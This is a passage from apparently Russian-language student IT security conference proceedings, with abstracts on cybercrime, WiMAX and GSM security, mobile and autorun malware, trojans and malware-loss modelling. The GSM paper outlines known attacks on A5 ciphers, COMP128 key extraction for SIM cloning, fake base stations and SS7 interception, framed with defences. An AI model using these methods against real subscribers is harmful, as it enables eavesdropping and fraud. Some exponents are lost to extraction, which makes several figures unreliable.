службу телекоммуникации и глобальные компьютерные сети, не предвидело, какие возможности для злоупотребления создают эти технологии. Сегодня жертвами преступников, орудующих в виртуальном пространстве, могут стать не только люди, но и целые государства. Основным своим оружием современные киберпреступники выбрали троянские программы, с помощью которых они строят компьютерные сети, зараженные вирусами и не подозревающие об
IT security conference for the next generation
17
этом (которые по-научному называются ботсетями) для кражи паролей и конфиденциальной информации, проводят различные атаки и шифруют данные, чтоб затем шантажировать своих жертв. А в настоящее время характерной чертой любого вируса является сохранение своего присутствия на инфицированной машине. Современные ботсети представляют собой управляемую сеть зараженных компьютеров, которые облегчают контроль за ботсетями и упрощают процесс незаконного сбора данных, точнее, все то, что говорилось выше. К таким ботсетям можно отнести спам, фишинг, DDoS-атака и многое другое. Киберпреступность в общих чертах можно представить в виде двух шагов: Доставка и установка вредоносных программ Сохранность ее на компьютере как можно больше необнаруженной. К доставке можно отнести такие системы, как спам-рассылка, зараженные web-страницы и другое, но больше всего страдают те, у кого есть в системе уязвимость, так как она позволяет установить ее сразу же после доставки спам - рассылок. В последнее время стали учащаться случаи жалоб пользователей сети Интернет на то, что в их адрес приходит все больше и больше непрошеной корреспонденции рекламного характера. Такие письма называются в Сети спамом. Результатами такой киберпреступности может служить повреждение ПО, похищение секретной информации, заказ услуг за чужой счет, фальсификация информации и другие повреждения. Решить проблемы можно с помощью создания и внедрения защитных стратегий. К которым можно отнести любые антивирусные системы. Или же, например, спамерских рассылок можно избежать следующим образом: 1) Постараться не оставлять своего адреса электронной почты на различного рода серверах сомнительного содержания. 2) Никогда не отвечать на письма спамеров - тем самым вы даете им знать, что Ваш адрес реально существует и поступающая туда почта читается владельцем. Если в их письме сказано, что Вы можете исключить себя из листа, послав по определенному адресу команду "remove" - в большинстве случаев это ложь. Последовав такому совету, Вы только подтвердите возможность использования Вашего адреса для дальнейших рассылок. 3) Не стоит посылать в адрес спамера кучи мусора. Возможно, Вы неверно определили, откуда в действительности пришел спам, и пострадают люди, не имеющие к спамеру никакого отношения. Также существуют различные методы для борьбы с фишингом, включая законодательные меры и специальные технологии, созданные для защиты от фишинга. В заключение можно сказать, что бороться с киберпреступностью надо всем вместе, сообща, чтоб дело было эффективнее. Таким образом, в данной работе были рассмотрены киберпреступность в современном мире и борьба с ней.
IT security conference for the next generation
18
2
Секция Компьютерные угрозы. Угрозы для мобильных устройств Организация защиты информации в сетях стандарта IEEE 802.16e Марданова Н. Казахский Национальный технический университет им. К. И. Сатпаева Алматы, Казахстан
[email protected] Мобильный WiMAX, появившись в 2005 году, в настоящее время принят многими организациями для обеспечения беспроводного широкополосного доступа. Разнообразные и многочисленные атаки являются прямым следствием существования уязвимостей стандарта. Повышение безопасности и надлежащая аутентификация являются основными потребностями мобильных сетей. Беспроводные сети WiMAX- одна из самых «горячих» тем последних лет. Данная технология и перспективы ее развития и применения обсуждаются на многочисленных конференциях и форумах, в том числе международных. Беспроводные сети давно стали неотъемлемой частью инфраструктуры ИТ, но интерес к ним, как и много лет назад, остается очень большим. Это обусловлено тем, что каждый последующий шаг на пути развития систем широкополосного беспроводного доступа (ШБД) открывает перед игроками рынка и пользователями новые возможности. Сектор беспроводных и мобильных технологий - один из наиболее динамично развивающихся сегментов рынка во всем мире. Интерес и необходимость к внедрению беспроводных технологий отмечается со стороны крупных компаний нефтегазового, энергетического комплекса, в местах, где проводная инфраструктура нерентабельна или недостаточна развита. Исследования рынка показывают, что инновационные беспроводные сетевые решения используют государственные и коммерческие предприятия различных отраслей промышленности, банки и финансовые центры, аэропорты и транспортные компании, гостиницы и бизнес-центры, предприятия военно-промышленного комплекса. Беспроводной широкополосный доступ - активно развивающийся сегмент телекоммуникационного рынка. Новейшие разработки востребованы и имеют огромное значение в развитии современной промышленности и экономики. Беспроводной – значит, передающий данные по радиоканалу, т.е. данные доступны всем желающим, здесь и возникает главная проблема – обеспечение безопасности и конфиденциальности передаваемой информации, а также задача определения подлинности клиента. Для решения этих проблем было предложено два механизма: шифрование данных и аутентификация клиента. Повышение уровня безопасности и условия надлежащего установления подлинности являются основными потребностями мобильной сети. Целью данной работы является исследование возможных нападений на основной протокол стандарта - Privacy and Key Management protocol (PKM). В рамках данной работы мной были рассмотрены механизмы обеспечения защиты информации в мобильных сетях стандарта IEEE 802.16. Был проведен статический анализ основного криптографического протокола стандарта, возможные атаки, связанные с распределением ключа авторизации, а так же методы борьбы с этими нападениями. Проведенный статический анализ был проверен средствами BAN-логики. Работа не завершается на этом этапе. В дальнейшем, на основании полученных теоретических выводов, планируется провести моделирование всех описанных событий в программной среде OMNET++ для подтверждения полученных результатов. Конечной целью работы станет апробация и дальнейшее исследование предлагаемых решений в реальной физической сети.
IT security conference for the next generation
19
Вредоносное мобильное программное обеспечение. Причины заражения и способы борьбы Халитова К.И. Самарский государственный аэрокосмический университет Самара, Россия
[email protected] Аннотация: В настоящее время вредоносное мобильное ПО еще не получило широкого распространения, однако не стоит его недооценивать. В то время, как телефоны все больше становятся похожими на ПК, они также становятся более уязвимыми, и появляется серьезная угроза информационной безопасности. Поэтому необходимо найти способы борьбы с вредоносным ПО уже на ранних стадиях его зарождения. Цель работы: выявить тенденции развития угроз для мобильных устройств и найти способы их устранения. Актуальность моей работы заключается в том, что мобильные телефоны широко используются во всем мире, и несмотря на то, что вредоносное мобильное ПО только начинает развиваться, оно представляет серьезную угрозу информационной безопасности. Объект исследования: информационная безопасность мобильных устройств. Предмет исследования: тенденции развития угроз для мобильных устройств. Задачи исследования: 1. проанализировать тенденции развития угроз для мобильных устройств за последние годы 2. выявить основные зоны риска 3. найти решения по устранению угроз для мобильных устройств Данная работа может быть использована в качестве учебного пособия по ознакомлению пользователей мобильных устройств с вредоносным ПО с целью предотвращения его распространения. Таким образом, можно устранить основную причину заражения вирусами.
IT security conference for the next generation
20
Мобильная защита данных на флэш-носителях Сергеева А.М. Башкирский Государственный Аграрный Университет Уфа, Россия
[email protected] Самый распространенный аксессуар у современного пользователя — компактный модуль флэш-памяти. Flash-USB-накопители представляют собой неотъемлемый атрибут повседневной жизни. Распространенность данных носителей информации окрепла по мере их удешевления и превратилась в само собой разумеющееся с появлением мобильного (portable) софта. В эпоху широкого распространения флэшек, карт памяти и других внешних устройств вирусописатели создали новый тип вирусов, созданных специально для съемных носителей Autorun-вирусы. На протяжении длительного периода времени не было каких-либо специализированных и адекватных средств защиты данных на флэш-носителях. Флэшки активно подвергались вредоносным действиям вирусов. Использование средств защиты антивирусных компаний являлось малоэффективным, поскольку из-за невозможности своевременного анализа службами антивирусных компаний «новые вирусы» не попадали в антивирусную базу. Изучение способов мобильной защиты данных на флэшках от вирусов и приемов их удаления стало целью и главной задачей моей работы. Анализ существующей по данной теме литературы в Интернете и имеющихся книжных источников позволил мне определить множество существующих программ-антивирусов, занимающихся разработкой данной темы, например USB Disk Security, AutoRunGuard, Flash Guard и некоторых других. Но я решила остановиться не на сравнительном анализе данных программ, а на способах защиты и удаления вирусов с флэш-носителей информации несложными системными средствами. В качестве одного из таких средств эффективной защиты от autorun-вирусов я рассматриваю имеющиеся способы отключения автозапуска. Сюда относятся способы двух типов: способы, которые уже устарели и не дают эффективной защиты из-за усилий прилагаемых вирусописателями и способы, которые пока являются недоступными для их действий и позволяют обойти вредоносные программы. К таким способам я отнесла, например, отключение автозапуска с форматированием флэшки в файловую систему NTFS и запрет записи на аппаратном уровне. Рассмотренные мною существующие методы позволяют сделать вывод, что работа в этом направлении должна продолжаться. Борьба между вирусописателями и пользователями продолжается. Поэтому пользователям и техническим службам антивирусных программ необходимо принимать активное участие в разработке способов защиты от вредоносных действий.
IT security conference for the next generation
21
Защита GSM-сетей от возможных атак Идрисова А. Магнитогорский государственный университет Магнитогорск, Россия
[email protected] На сегодняшний день GSM (Global System for Mobile Communications) является самой широкоиспользуемой системой сотовой телефонной связи. Ежедневно люди передают по GSM-сетям ценную информацию, представляющую интерес для злоумышленников. За время существования стандарта были разработаны различные методы взлома систем его информационной защиты, совершенствовалась аппаратура для перехвата и расшифровки. И если раньше устройства прослушивания находились в распоряжении только правоохранительных органов, то в последнее время они стали появляться в широком доступе. Теперь без специальных дополнительных средств защиты нельзя быть уверенным, что конфиденциальная информация, передаваемая по мобильным сетям, не окажется в руках злоумышленников. Поэтому рассматриваемая в данной работе проблема защиты пользователей систем подвижной сотовой связи стандарта GSM от прослушивания, мошенничества, клонирования SIM-карт является исключительно актуальной. Цель исследования состоит в изучении уязвимостей, угроз информационной безопасности сетей стандарта GSM и формулировке рекомендаций по защите информации, передаваемой по цифровым сетям сотовой связи. Достижение цели написания работы потребовало постановки и решения следующих задач: изучение архитектуры и принципа работы СПС стандарта GSM; анализ уязвимостей модели безопасности стандарта GSM; рассмотрение возможных атак на GSM и попыток компрометации системы защиты GSM; определение способов препятствования взлому механизмов безопасности и анализ существующих средств защиты абонентов GSM. Стандарт GSM начал разрабатываться специальной европейской группой разработчиков Group Special Mobile (отсюда первоначальное название) в 1982 году как единая европейская цифровая сотовая система, функционирующая в диапазоне 862-960 МГц. С первым запуском в 1992 году началось широкое распространение стандарта по всему миру, росло количество пользователей, и стандарт был переименован в Global System for Mobile Communications. Система GSM состоит из трѐх основных частей: Мобильная Станция (Mobile Station),состоящая из мобильного устройства и SIM (Subscriber Identity Module - модуль идентификации абонента) карты, Подсистема Базовой Станции (Base Station Subsystem), управляющая радиосоединением с Мобильной Станцией, и собственно Подсистема сети (NetWork Subsystem), основной частью которой является Центр Коммутации и Управления Мобильными услугами (Mobile services Switching Center(MSC)). Подсистема базовых станций состоит из самих Базовых Станций (Base Transceiver Station (BTS)), которые обеспечивают радиопокрытие территории, передачу и прием голоса и данных, служебной информации от/к мобильной станции, и Контроллера Базовых Станций (Base Station Controller (BSC)). В подсистему сети входят Регистр Идентификации Оборудования (EIR - Equipment Identity Register), являющийся базой данных, содержащей список пригодного в данной сети мобильного оборудования, Центр Аутентификации (AuC - Authentication Center), предназначенный для аутентификации каждой SIM карты, которая пытается присоединиться к GSM сети. Регистры собственных абонентов и гостей (HLR - Home Location Regisrer и VLR - Visitor Location Register) вместе с Центром Коммутации и Управления (MSC) поддерживают маршрутизацию и возможность перемещения абонентов сети GSM. Технология GSM поддерживает такие механизмы безопасности, как секретность абонента, секретность передачи данных, секретность направлений соединений абонента и аутентификация. Основа безопасности GSM – три секретных алгоритма, которые сообщаются лишь поставщикам оборудования, операторам связи и т.д. Это A3 – алгоритм авторизации, защищающий телефон от клонирования, A8 – алгоритм, который генерирует криптоключ на основе выходных данных алгоритма A3, A5 – алгоритм шифрования оцифрованной речи для обеспечения конфиденциальности переговоров. Определение подлинности абонента начинается с передачи IMSI (International Mobile Subscriber Identity) абонента в AuC, который в ответ генерирует 128-битовое случайное число – RAND и пересылает его телефону. Внутри SIM с помощью ключа Ki и алгоритма идентификации А3 вычисляется 32-битовый ответ – SRES. Если SRES, вычисленный в телефоне, совпадет со SRES, рассчитанным AuC, то процесс авторизации считается успешным и абоненту присваивается TMSI (Temporary Mobile Subscriber Identity-временный номер мобильного абонента). После аутентификации IT security conference for the next generation
22
происходит шифрование данных, передаваемых мобильной станцией. Для того чтобы получить последовательность шифрования для каждого пакета, алгоритм А5 производит вычисление, используя два ввода: одним из них является 22-битный номер кадра, а другим является ключ, обозначаемый Кс, состоящий из 64 бит и известный только мобильной станции и сети. Сейчас мобильными операторами используется алгоритм COMP128, который, объединяя в себе алгоритмы А3 и А8, сразу вычисляет и SRES и Kc значение на основе RAND и Ki. В настоящее время базовые станции могут поддерживать три основных варианта алгоритма А5: А5/0, А5/1 и А5/2. В алгоритме А5/0 разговор не шифруется и передается прямым текстом, в этом случае разговор может быть перехвачен сканером радиочастот. Схема алгоритма А5/1 содержит 3 регистра LSFR различной длины (19, 22, 23 бита), суммарной длиной в 64 бита. Формирование выходной последовательности происходит путем сложения потока исходного текста с генерируемой последовательностью (гаммой). В алгоритме А5/2 используется более слабая система 16 шифрования со стойкостью 2 , чем в А5/1, так как эта модификация создавалась на экспорт в страны, не входящие в ЕС. Стандарт GSM, создававшийся при активном участии спецслужб стран НАТО, был спроектирован как безопасная система мобильной связи с надѐжной аутентификацией и сильным шифрованием передаваемых данных. Однако со временем стало ясно, что модель безопасности стандарта GSM имеет некоторые дефекты. Уязвимости GSM сетей В последнее время всѐ чаще появляется информация о возможности перехвата, взлома стандарта GSM и клонирования абонентских терминалов, работающих в этих сетях. Причиной тому является ряд уязвимостей, обнаружившийся в системе защиты GSM за время его эксплуатации. Ослабление ключа шифрования. В 64-битном ключе Кс, который A8 генерирует для A5, последние 10 бит обнулены. Это совершенно умышленное ослабление системы примерно в 1000 раз было сделано операторами, чтобы снизить стоимость SIM-карт и облегчить правоохранительным органам задачу контроля за абонентами любых средств связи в ходе оперативно-розыскных мероприятий. Секретность алгоритмов. Секретность алгоритмов стандарта не даѐт сообществу криптоаналитиков проверять их на наличие ошибок. Ведь согласно принципу Керкхоффа, наиболее безопасными являются системы, криптозащищенность которых зависит только от ключа, алгоритмы же, наоборот, должны быть открыты. Недостатки алгоритмов. В шифре A5/1 с 64-битным ключом имеются многочисленные конструктивные дефекты, приводящие к стойкости, не превышающей стойкость шифра с 40-битным ключом (другими словами, стойкость понижена на 6 порядков, или в миллион раз). В А5/2 к трем основным регистрам добавлен еще 17 битовый, управляющий движением бит в остальных. Но криптоаналитиками было установлено, что для вскрытия 16 системы достаточно прямым перебором (сложность 2 ) найти заполнение управляющего регистра. Такой шифр вскрывается за 15 миллисекунд работы современных вычислительных машин. Уязвимость протокола COMP 128 состоит в том, что по специальному алгоритму «запрос-ответ», можно вычислить реальное значение Ki. После некоторого количества запросов к SIM-карте и анализа полученных ответов удается правильно вычислить значение ключа Ki. Отсутствие шифрования в сети оператора. В системе GSM передачи шифруются только между MS и BTS. После BTS трафик между MSC и BSC, в сети оператора передаѐтся незашифрованным. Открытая передача IMSI. Сети GSM передают уникальные идентификаторы SIM-карт открытым текстом, что позволяет установить, каким телефоном пользуется человек. SIMкарты используют виртуальные машины Java, к которым у операторов есть доступ, и злоумышленники, по мнению американских специалистов по безопасности Халтона и Стива, могут внедрять в телефоны пользователя без их ведома программы, переадресовывающие трафик. Отсутствие аутентификации базовых станций. Ещѐ один недостаток сетей в том, что базовые станции проводят аутентификацию мобильных станций, а мобильные станции не могут аутентифицировать BTS, что используют злоумышленники, подделывая BTS. Возможные способы атаки GSM и улучшения защиты Со времени появления стандарта GSM возникли различные методы вскрытия алгоритмов, прослушивания и клонирования телефонов. 1. Лобовая атака A5 54 Позволяет организовать вскрытие ключа с перебором максимум 2 вариантов. Делается предположение о содержимом первых двух регистров, а содержимое третьего регистра восстанавливается по шифрующей гамме. Вскрытие занимает 250 часов при одном чипе в 600Mhz. Атаку можно распределить между несколькими чипами, и таким образом значительно сократить время.
IT security conference for the next generation
23
2. Атака A5 «Разделяй и Властвуй» 54 Атака «Разделяй и Властвуй» позволяет уменьшить стойкость алгоритма с 2 при лобовой 45 атаке до 2 . Атакующий должен знать 64 последовательные бита гаммы, которые можно извлечь, если атакующий знает какой-либо текст шифра и соответствующий открытый текст. Атака реализуется путем угадывания содержания двух более коротких LSFR, а затем вычисления третьего LSFR из известной гаммы. Для защиты от двух описанных выше атак ассоциацией GSM разработан новый алгоритм А5/3, обладающий длиной ключа в 128 бит. Его внедрение поднимет защищенность сотовой связи стандарта GSM на более высокий уровень. Однако эта технология поддерживается пока лишь незначительным числом, так как смена алгоритма - это дело не только технически сложное, но и невыгодное с точки зрения финансов. Компаниям придется менять до 60 несущих частот на всех своих станциях, а большинство сотовых компаний почти на 100% задействуют свой мобильный ресурс и ѐмкость. 3. Доступ к сигнальной сети Открытая передача в сигнальной сети оператора даѐт возможность каждому, имеющему доступ к сигнальной системе, читать или модифицировать данные на лету. То есть, сигнальная сеть SS7 полностью незащищена. Злоумышленник может слушать все передачи, включая сами телефонные звонки, а также RAND, SRES и Kc. Для того, чтобы не допускать такого рода атаки, необходимо применять шифрование трафика в основной сети оператора между компонентами сети. 4. Получение ключа из SIM Знание секретного ключа Ki является ключевым в шифровании сообщений стандарта GSM, таким образом, получение этого ключа дает криптоаналитику возможность беспрепятственного доступа к открытому тексту. Атака проводится при физическом контакте с SIM-картой, путѐм запросов к SIM и вычисления на основе полученных данных с помощью дифференциального криптоанализа Ki. 5. Получение ключа из SIM карты в эфире Исследователи SDA ISAAC уверены, что такая же атака с клонированием SIM карты может быть реализована и эфире. Заключается она в следующем: Когда сигнал BTS злоумышленника превышает сигнал базовой станции абонента, криптоаналитик может бомбардировать MS запросами нужного формата и получать соответствующий отклик. Возможно провести атаку в местах слабого сигнала базовой станции или местах его отсутствия, например, в метро. Предположительное время атаки: 8-13 часов. Возможно разбить атаку на интервалы по несколько минут, что упрощает проблему физической реализации данного метода. 6. Взлом алгоритма A8 Заключается в извлечении секретного ключа Ki на основе случайного вызова RAND, сеансового ключа Kc и отклика SRES (предполагается, что один и тот же алгоритм используется в A3 и A8, как в случае с COMP128). Например, злоумышленник может найти RAND, который производит в результате Ki. Все три переменные относительно просто найти. RAND и SRES отсылаются в эфир открытым текстом. Сеансовый ключ Kc можно вычесть из зашифрованных кадров и известного открытого текста. Использование второй, более защищѐнной версии протокола COMP128 - COMP128-2 позволит предотвратить клонирование SIM-карт. Кроме того, есть еще одна защита от подбора ключа: количество запросов к SIM-карте (в зависимости от производителя) ограничено определенным числом (по наблюдениям пользователей, не менее 64 000), и после исчерпания этого числа попыток карта блокируется и приходит в негодность. 7. Получение ключа из AuC. Основана на исследовании информации, которая поступает от базового оператора к оператору, осуществляющему роуминг в другой точке планеты в случае, конечно, если абонент использует роуминг в данный момент. Со времени создания стандарта не раз предпринимались попытки взлома секретных алгоритмов. Например, совсем недавно, в декабре 2009 года немецкий компьютерный инженер Керстин Нол сообщил о создании метода взлома системы шифрования с применением огромной таблицы для подбора ключа, первого, с 1988 года, реально обходящего систему. Если раньше оборудование для этого стоило сотни тысяч долларов и доступ к таким технологиям имели только государственные структуры и крупные криминальные группировки, то с этой разработкой использовать оборудование для взлома смогут многие люди или организации, заинтересованные в расшифровке звонков в системе GSM. Аппаратура для перехвата и расшифровки GSM-сигнала появилась в арсенале силовых структур одновременно с принятием стандарта GSM. Сейчас в мире существует около 20-ти эффективных (и, если можно так сказать, популярных) видов оборудования для прослушивания GSM-связи.
IT security conference for the next generation
24
Рекомендации по защите пользователей GSM-связи от прослушивания и клонирования Для защиты от перехвата, взлома стандарта GSM и клонирования абонентских терминалов, работающих в этих сетях необходимы усилия и государства, и оператора сотовой связи, и самого пользователя. Государство должно обеспечивать контроль над соблюдением законодательства в сфере использования спецтехники для организации радиоразведки частными лицами, негосударственными организациями и силовыми структурами. Операторы должны внедрять более стойкие алгоритмы (А5/3,СОМР-2, СОМР-3), контролировать каналы связи. Пользователь также должен позаботиться о конфиденциальности данных, передаваемых им по сотовым сетям, и защите от мошенничества. В первую очередь нужно соблюдать меры безопасности, а именно не стоит передавать конфиденциальную информацию по мобильным сетям в открытом виде, нельзя оставлять на долгое время свой телефон у посторонних лиц во избежание клонирования SIM -карты. Если всѐ же приходится вести конфиденциальные переговоры по мобильному телефону, есть несколько довольно эффективных способов обезопасить себя от прослушивания и мошенничества. Это специальные устройства и программы для защиты данных, передаваемых по сотовой связи. На рынке представлены два класса специальных технических устройств защиты, одни из них - скремблеры, криптофоны - препятствуют перехвату и раскодированию речи. Другие акустические сейфы, интеллектуальные микроблокираторы - не позволяют использовать мобильный телефон в виде микрофона, негласно "присутствующего" при абоненте. Криптофон –телефон с функцией абонентского шифрования, принятая или отправленная им информация кодируется, а уже потом подается на динамик или уходит в эфир. Акустические сейфы гарантируют защиту владельца сотового телефона от негласного прослушивания через каналы сотовой связи путем несанкционированной активации его аппарата в режиме удаленного информационного доступа. Интеллектуальные микроблокираторы - это те же акустические сейфы, но с «интеллектуальным» режимом работы, заключающемся в том, что при наличии вызывного акустического сигнала (гудка телефонной трубки, музыки и т.п.) блокиратор не включается. Скремблеры - устройства для шифрования речи, которые подключаются к мобильному терминалу с помощью кабеля или по Bluetooth. Программные решения безопасности также используют шифрование данных и реализуются в основном на картах формата microSD . Ещѐ одним решений проблемы защиты сотовой связи является переход на более безопасные сети третьего поколения, использующие стойкие алгоритмы шифрования и двустороннюю аутентификацию. Однако для этого нужно наличие у всех абонентов аппаратов, поддерживающих данную технологию. В городах, где запущены 3G сети, пользователям сотовой связи лучше переходить на них. Таким образом, сегодня, когда информация является самым дорогим товаром, а сотовые сети стандарта GSM стали уязвимы для множества атак, нацеленных на различные участки сети, перед Консорциумом GSM встаѐт необходимость пересмотра всей модели безопасности этого стандарта. А пользователям мобильных сетей, желающим обезопасить себя от прослушивания, мошенничества, клонирования необходимо предпринимать дополнительные меры по защите данных, использовать специальные технические средства повышения безопасности связи.
IT security conference for the next generation
25
Формальная модель оценки убытков предприятия от заражения вредоносными программами Бочарникова М.В. Соавторы: Сапрыкин А.С., Адамов А.С. Харьковский Национальный университет радиоэлектроники Харьков, Украина
[email protected] Введение Реалии современного мира экономики таковы, что в условиях агрессивной рыночной среды практически любая компания постоянно сосредоточена на поддержании своей конкурентоспособности. И акцент здесь все больше смещается от конкурентоспособности продуктов или услуг к конкурентоспособности компании в целом. Очевидно, что основным инструментом ее поддержания является стратегическое бизнес-планирование, направленное на развитие ее адаптивности и повышение устойчивости к воздействию рыночной среды. Одним из критериев, определяющих финансовую устойчивость компании, являются темпы роста прибыли, опережающие темпы роста затрат на содержание компании. Главная цель любого коммерческого предприятия – получение прибыли и ее максимизация. С экономической точки зрения прибыль - это разница между денежными поступлениями и денежными выплатами. Если эта разница оказывается отрицательной, то предприятие убыточно. Чтобы увеличивать прибыль, руководство стремится минимизировать издержки. Следовательно, из-за того, что могут возникнуть непредвиденные затраты: влияние вредоносных программ, утечка информации, атаки на компьютерную сеть, предприятие недополучит планируемые финансовые поступления, понесет убытки, может потерять ценных клиентов, деловых партнеров, они с опасением будут относиться к предприятию, которое не может защитить себя от подобных атак [1]. Увеличение количества персональных компьютеров, рост пропускных способностей коммуникационных каналов ведет к тому, что масштабы вирусных эпидемий, а соответственно, и потери от них, растут с каждым годом, поэтому руководству компаний необходимо достаточно серьезно и ответственно подходить к вопросам информационной безопасности своего предприятия. В современном мире стремительное развитие информационных технологий приводит к более эффективной работе всех структур и подразделений предприятий, но в то же время с каждым днем увеличивается вероятность проникновения вредоносных программ в компьютерную систему, что может повлечь за собой не только кратковременные сбои в сети, но и полную остановку деятельности предприятия. Убытки, наносимые вредоносными программами по всему миру, исчисляются миллиардами долларов и продолжают ежегодно расти. Деструктивное действие вирусных технологий ощущают как крупные компании, так и компании среднего бизнеса, где информационной безопасности уделяется достаточно мало внимания, а число компьютеров постоянно увеличивается [2]. Целью исследования является разработка методики оценки ущерба от распространения деструктивных вирусных технологий в компьютерных сетях предприятий. Объектом исследования служит структура экономических взаимоотношений всех субъектов предпринимательской деятельности рынка, а субъектом выступает деятельность отдельных предприятий. Модель оценки финансового ущерба от распространения деструктивных вирусных технологий в компьютерных сетях предприятий С экономической точки зрения деятельность любого предприятия можно представить в виде набора показателей, профессионально оценивая которые можно с определенной долей вероятности судить о настоящем положении дел на этом предприятии и делать необходимые прогнозы на будущее. Набор этих показателей (показатели ликвидности, рентабельности, устойчивости, показатели производительности труда, роста объема производства, количества затрат и др.) в совокупности дает возможность сделать очень качественную комплексную оценку и характеристику финансового состояния. Объединяя эти показатели в одну многофакторную модель с помощью статистических данных за как можно больший промежуток времени, можно выявить закономерности и зависимости, анализируя которые в будущем можно судить об изменениях в работе предприятия. Эти изменения могут происходить как в сторону улучшения конечного IT security conference for the next generation
26
финансового результата, так и, соответственно, его ухудшения, и являться следствием воздействия различных внутренних и внешних факторов. Наша задача состоит в том, чтобы определить воздействие именно компьютерных вирусных технологий и оценить ущерб от их деструктивной активности. Эти изменения носят разносторонний характер, что связано со спецификой отраслей экономики, с текущими особенностями действующих предприятий, с состоянием экономической среды, в которой они работают. На рисунке 1 представлена модель финансового ущерба, которая имеет следующий вид:
Прямые трудовые затраты
Прямые материальные затраты
Модель предприятия
Выделение основных показателей на Анализ изменений в которые влияют Изменяем модели предприятия комп.вирусы показатели
Общепроизводственные затраты
Коммерческие и административные затраты
...
Рассчитываем вероятность заражения вредоносным кодом
Расчет возможного ущерба
Анализ статистических данных по типам вредоносных прогамм
Простой
Banking trojan
NPV/IRR
Расчет эффекта от вложений в ИБ
Хулиганство
Кража конфиденциальн ых данных
Рисунок 1. Модель расчета финансового ущерба Финансовые потери, которые несут предприятия от вирусных атак можно представить следующим образом [3]: при ведении электронной коммерции - потери, связанные с простоем и выходом из строя сетевого оборудования; нанесение ущерба имиджу и репутации компании; оплата сверхурочной работы ИТ-персонала и/или оплата работ подрядчикам, которые занимались восстановлением корпоративной информационной системы;
IT security conference for the next generation
27
оплата консультаций внешних специалистов, которые осуществляли восстановление данных, выполняли ремонт и оказывали юридическую помощь; оплата ремонта физических повреждений от виртуальных атак; Чтобы рассчитать потери компании от вирусов (ML), необходимо разделить их на несколько составляющих в зависимости от характера их воздействия на деятельность предприятия: сбои (полная остановка работы) в работе компьютеров. Здесь учитывается кол-во компьютеров (шт.), время наладки 1-го компьютера (ч), стоимость наладки (почасовая или в зависимости от сложности); мошенничество, кража денег со счетов: количество существующих счетов-депозитов, сумма средств на счетах; хулиганство (вирусы, которые мешают работать, отвлекают, засоряют компьютер): кол-во потраченного рабочего времени (ч) в сутки. Список использованных источников 1. О. К. Филатов, Л. А. Козловских, Т. Н. Цветкова Планирование, финансы, управление на предприятии. Практическое пособие. - Финансы и статистика, 2005 г. – 384 с. 2. www.securelist.com 3. Бочарникова М.В., Сапрыкин А.С. Разработка методики оценки ущерба от распространения вирусных технологий на действующих предприятиях, студенческая конференция IT Security for new generation, Москва 28-29 августа 2008 г. 4. Бочарникова М.В., Сапрыкин О.С., Україна, Харків Економічні інструменти інформаційної безпеки виробничих та підприємницьких структур в сучасних умовах. Інформаційні технології: наука, техніка, технологія, освіта, здоров'я XVI міжнародна конференція Харків, 4-6 червня 2008. 5. Селезнева Н.Н., Ионова А.Ф. Финансовый анализ. Управление финансами: Учеб. пособие для вузов.- 2-е изд. – М.: ЮНИТИ-ДАНА, 2003. – 639 с. 6. http://www.dnt-lab.com
IT security conference for the next generation
28
Сравнительный анализ программных и аппаратных троянских программ Адамов А.С. Харьковский Национальный университет радиоэлектроники Харьков, Украина
[email protected] Данная статья описывает угрозы информационной безопасности, осуществляемые с помощью вредоносных включений в программном и аппаратном обеспечении, называемые троянцами. Создание троянцев обусловлено, большей частью, получением финансовой прибыли и саботажем. Целью работы является сравнение проблемы безопасности компьютерных систем на программном уровне с такой же проблемой в аппаратных системах, таких как система-на-кристалле, без которых невозможно представить на сегодняшний день ни одно мобильное устройство. Таким образом, класс троянских вредоносных программ рассматриваются как в рамках программного, так и аппаратного обеспечения. Ключевые слова: троянец, система-на-кристалле, классификация.
IT security conference for the next generation
29
3
Секция
Криптография, ее актуальность в современном обществе Методы обеспечения целостности и конфиденциальности пользовательской информации в сетях с гарантированным качеством обслуживания Солонская О.И. Сибирский государственный университет телекоммуникаций и информатики (ГОУ ВПО "СибГУТИ")
[email protected] Сети связи с гарантированным качеством обслуживания строятся в соответствии с концептуальными положениями построения мультисервисных сетей связи (МСС) на взаимоувязанной сети России и обеспечивают предоставление инфокоммуникационных услуг, к которым предъявляются такие требования как: мобильность услуг; гарантированное качество услуг или качество обслуживания (Quality of Service, QoS); обеспечение информационной безопасности передаваемой информации. Большинство технологий, на основе которых реализуются МСС, способны предоставить дифференцированное качество обслуживания, базирующееся на том или ином методе классификации требований к QoS. В качестве основных критериев такой классификации используются следующие группы параметров, объединенных под термином «вероятностновременные характеристики» (ВВХ): параметры пропускной способности: средняя, максимальная и минимальная скорости передачи данных; параметры задержек: средняя и максимальная величины задержек, а также среднее и максимальное значение отклонений интервалов между пакетами данных в получаемом трафике по сравнению с отправленным; параметры надежности передачи пакетов данных: вероятность потери и искажения пакетов данных. Достижение требуемой степени защиты информации достигается с помощью разных методов. Методы, обеспечивающие целостность пользовательской информации, в основном, сводятся к ее контролю: метод контрольных сумм; метод «циклического контрольного кода»; метод однонаправленных функций хэширования; электронная цифровая подпись. Конфиденциальность же обеспечивается с помощью криптографических алгоритмов. В соответствии с моделью взаимосвязи открытых систем (МВОС) все эти службы могут быть реализованы на верхних уровнях. Однако, в этом случае пользователь должен быть достаточно компетентен для использования тех или иных криптографических средств. Кроме того, существуют определенные ограничения на длину ключа для приложений, функционирующих в реальном масштабе времени (критичных к задержкам) на высоких скоростях (например, видеоконференции), что влечет за собой невыполнение требуемого уровня QoS. В данной работе предложены:
IT security conference for the next generation
30
метод обеспечения целостности данных при помощи организации параллельных соединений; методика обеспечения конфиденциальности при помощи организации вложенных соединений защиты. Разработка этих методов связано с решением следующих задач. 1) для обеспечения целостности информации: синтез оптимального решающего устройства (РУ) на приемной стороне, реализующего целостность пользовательской информации на сетевом уровне (МВОС); оценка вероятности целостности информации на выходе РУ; выбор оптимальных ресурсов сети связи для обеспечения требуемой целостности пользовательской информации; 2) для обеспечения конфиденциальности информации: анализ подхода к организации структур соединений защиты (ССЗ) на сетевом уровне МВОС; оценка вероятностей обеспечения конфиденциальности информации, в том числе и с учетом несанкционированного воздействия (НСВ). На основе решения вышеуказанных задач сформирован алгоритм обеспечения целостности информации, состоящий из нескольких этапов. На первом этапе протоколы маршрутизации отбирают соединения с выбранными параметрами. Второй этап включает в себя процесс установления этих «параллельных» соединений с помощью протоколов сигнализации. На следующем этапе задействуются протоколы передачи пользовательской информации, содержащие алгоритм работы РУ (принимается решение о переданном сообщении). Разработан алгоритм обеспечения конфиденциальности пользовательской информации на основе метода, изложенного в ATM Security Specification. Производится 